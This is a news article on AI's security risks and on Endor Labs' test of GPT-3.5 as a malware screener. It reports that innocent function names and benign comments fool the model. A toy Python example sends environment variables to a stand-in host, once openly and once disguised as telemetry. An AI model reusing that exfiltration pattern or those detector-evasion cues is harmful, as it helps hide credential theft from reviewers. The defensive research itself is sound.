White House addresses AI’s risks and rewards as security experts voice concerns about malicious use – TechRepublic


Image: Shuo/Adobe Stock

Last week, the White House released a statement about the use of artificial intelligence, including large language models like ChatGPT.

The statement addressed concerns about AI being used to spread misinformation, amplify biases and expose private data, and announced a meeting between Vice President Kamala Harris and leaders of ChatGPT maker OpenAI (which is backed by Microsoft), along with executives from Alphabet and Anthropic.

But some security experts see adversaries, who operate under no ethical constraints, using AI tools on numerous fronts, including generating deepfakes in the service of phishing, and they worry that defenders will fall behind.

Uses, misuses and potential over-reliance on AI

Artificial intelligence “will be a huge challenge for us,” said Dan Schiappa, chief product officer at security operations firm Arctic Wolf.

“While we need to make sure legitimate organizations aren’t using this in an illegitimate way, the unflattering truth is that the bad guys are going to keep using it, and there is nothing we are going to do to regulate them,” he said.

According to security firm Zscaler’s ThreatLabz 2023 Phishing Report, AI tools were partly responsible for a 50% increase in phishing attacks last year compared with 2021. In addition, chatbot AI tools have allowed attackers to hone such campaigns by improving targeting and making it easier to trick users into compromising their security credentials.

AI in the service of malefactors isn’t new. Three years ago, Karthik Ramachandran, a senior manager in risk assurance at Deloitte, wrote in a blog post that hackers had been using AI to create new cyber threats, citing the Emotet trojan targeting the financial services industry as one example. He also alleged in the post that Israeli entities had used AI to fake medical results.

This year, malware campaigns have turned to generative AI technology, according to a report from Meta. The report noted that since March, Meta analysts have found “…around 10 malware families posing as ChatGPT and similar tools to compromise accounts across the internet.”

According to Meta, threat actors are exploiting interest in AI by creating malicious browser extensions, available in official web stores, that claim to offer ChatGPT-related tools; some include working ChatGPT functionality alongside the malware.

“This was likely to avoid suspicion from the stores and from users,” Meta said. The company also said it detected and blocked more than 1,000 unique malicious URLs from being shared on Meta apps and reported them to industry peers at file-sharing services.

Common vulnerabilities

While Schiappa agreed that AI can be used to write malicious code that exploits vulnerabilities, he argued that the quality of the output LLMs generate is still hit or miss.

“There is a lot of hype around ChatGPT but the code it generates is frankly not great,” he said.

Generative AI models can, however, accelerate processes significantly, Schiappa said, adding that the “invisible” parts of such tools (the aspects of the model not involved in the natural language interface with a user) are actually riskier from an adversarial perspective and more powerful from a defensive one.

Meta’s report said industry defensive efforts are forcing threat actors to find new ways to evade detection, including spreading across as many platforms as they can to protect against enforcement by any one service.

“For example, we’ve seen malware families leveraging services like ours and LinkedIn, browsers like Chrome, Edge, Brave and Firefox, link shorteners, file-hosting services like Dropbox and Mega, and more. When they get caught, they mix in more services including smaller ones that help them disguise the ultimate destination of links,” the report said.

For defense, AI is effective, within limits

With an eye to the capabilities of AI for defense, Endor Labs recently studied whether AI models can identify malicious packages by focusing on source code and metadata.

In an April 2023 blog post, Henrik Plate, a security researcher at Endor Labs, described how the firm looked at defensive performance indicators for AI. Used as a screening tool, GPT-3.5 correctly identified malware only 36% of the time, correctly assessing only 19 of 34 artifacts from nine distinct packages that contained malware.

Also, from the post:

  • 44% of the results were false positives.
  • Using innocent function names, the researchers were able to trick ChatGPT into changing an assessment from malicious to benign.
  • ChatGPT versions 3.5 and 4 came to divergent conclusions.
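
The general shape of this kind of LLM-based screening is easy to sketch. The Python snippet below is a hypothetical illustration only: the prompt wording, the gpt-3.5-turbo model name and the screen_file helper are assumptions made for this example, not Endor Labs’ implementation, and any verdict it returns should be treated as one noisy signal rather than a final judgment, as Plate’s numbers above suggest.

    # Hypothetical sketch of LLM-assisted package screening, loosely inspired by the
    # experiment described above. This is NOT Endor Labs' tooling: the prompt, the
    # model name and the file-size truncation are illustrative assumptions only.
    from pathlib import Path

    from openai import OpenAI  # assumes the official openai Python client is installed

    client = OpenAI()  # reads OPENAI_API_KEY from the environment

    PROMPT = (
        "You are reviewing an open source package for signs of malicious behavior "
        "(data exfiltration, credential theft, obfuscated downloads and so on). "
        "Answer with a single word, MALICIOUS or BENIGN, followed by a short reason.\n\n"
        "Source file:\n{source}"
    )

    def screen_file(path: str) -> str:
        """Ask the model for a coarse malicious/benign verdict on one source file."""
        source = Path(path).read_text(errors="replace")[:8000]  # crude guard against context limits
        response = client.chat.completions.create(
            model="gpt-3.5-turbo",
            messages=[{"role": "user", "content": PROMPT.format(source=source)}],
            temperature=0,  # keep the verdict as deterministic as the API allows
        )
        return response.choices[0].message.content

    if __name__ == "__main__":
        # Hypothetical path; in practice every file of a package would be screened.
        print(screen_file("suspect_package/setup.py"))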

AI for defense? Not without humans

Plate argued that the results show LLM-assisted malware reviews with GPT-3.5 aren’t yet a viable alternative to manual reviews, and that while an LLM’s reliance on identifiers and comments can be valuable for developers, those same cues can easily be abused by adversaries to evade detection of malicious behavior.

“But even though LLM-based assessment should not be used instead of manual reviews, they can certainly be used as one additional signal and input for manual reviews. In particular, they can be useful to automatically review larger numbers of malware signals produced by noisy detectors (which otherwise risk being ignored entirely in case of limited review capabilities),” Plate wrote.

He described 1,800 binary classifications performed with GPT-3.5 that included false positives and false negatives, noting that the classifications could be fooled with simple tricks.
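
The post reports rates rather than a full confusion matrix, but the arithmetic behind such figures is simple. The short sketch below uses invented counts, purely to show how detection and false-positive rates are derived from a batch of binary verdicts; the numbers are not Endor Labs’ data.

    # Invented counts for illustration only -- these are not Endor Labs' results.
    def screening_rates(tp: int, fp: int, tn: int, fn: int) -> dict:
        """Derive common screening metrics from a confusion matrix of verdicts."""
        return {
            "detection_rate": tp / (tp + fn),       # share of truly malicious artifacts flagged
            "false_positive_rate": fp / (fp + tn),  # share of benign artifacts wrongly flagged
            "precision": tp / (tp + fp),            # how often a "malicious" verdict is correct
        }

    # Example: 50 truly malicious and 950 benign artifacts, screened automatically.
    print(screening_rates(tp=30, fn=20, fp=95, tn=855))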

“The marginal costs of creating and releasing a malicious package come close to zero,” Plate explained, because attackers can automate the publishing of malicious software on PyPI, npm and other package repositories.

Endor Labs also looked at ways of tricking GPT into making wrong assessments. Simple techniques were enough to flip an assessment from malicious to benign, for example by using innocent function names, adding comments that indicate benign functionality or including benign-looking string literals.
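
As a harmless illustration of why such tricks work, the toy snippet below shows two functions with identical behavior: one wears an obviously suspicious name, the other hides behind an innocent name, a reassuring docstring and benign-looking string literals. Every identifier and the non-resolvable .invalid endpoint are invented for this example; nothing here is taken from Endor Labs’ samples.

    import urllib.request

    # Both functions post the same data to the same (deliberately non-resolvable)
    # address. Only the surface cues differ -- which is exactly what a classifier
    # leaning on names, comments and string literals will latch onto.

    def exfiltrate_env_vars(env: dict) -> None:
        # Obvious cues: the name alone signals intent to a reviewer or an LLM.
        urllib.request.urlopen("http://collector.invalid/upload", data=repr(env).encode())

    def sync_usage_telemetry(env: dict) -> None:
        """Send anonymous usage statistics to help us improve the product."""
        service = "collector.invalid"  # benign-sounding literal, same destination
        report = repr(env).encode()
        urllib.request.urlopen("http://" + service + "/upload", data=report)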

AI can play chess way better than it can drive a Tesla

Elia Zaitsev, chief technology officer at CrowdStrike, said that a major Achilles heel for AI as part of a defensive posture is that, paradoxically, it only “knows” what is already known.

“AI is designed to look at things that have happened in the past and extrapolate what is going on in the present,” he said. He suggested this real-world analogy: “AI has been crushing humans at chess and other games for years. But where is the self-driving car?”

“There’s a big difference between those two domains,” he said.

“Games have a set of constrained rules. Yes, there’s an infinite combination of chess games, but I can only move the pieces in a limited number of ways, so AI is fantastic in those constrained problem spaces. What it lacks is the ability to do something never before seen. So, generative AI is saying ‘here is all the information I’ve seen before and here is statistically how likely they are to be associated with each other.’”

Zaitsev explained that fully autonomous cybersecurity, if it is ever achieved, would have to handle the same kind of open-ended problem that self-driving cars have yet to master: a threat actor is, by definition, trying to circumvent the rules to come up with new attacks.

“Sure, there are rules, but then out of nowhere there’s a car driving the wrong way down a one-way street. How do you account for that?” he asked.

Adversaries plus AI

For attackers, there is little to lose from using AI in versatile ways, because they can combine human creativity with AI’s ruthless, 24/7, machine-speed execution, according to Zaitsev.

“So at CrowdStrike we are focused on three core security pillars: endpoint, threat intelligence and managed threat hunting. We know we need constant visibility of how adversary tradecraft is evolving,” he added.


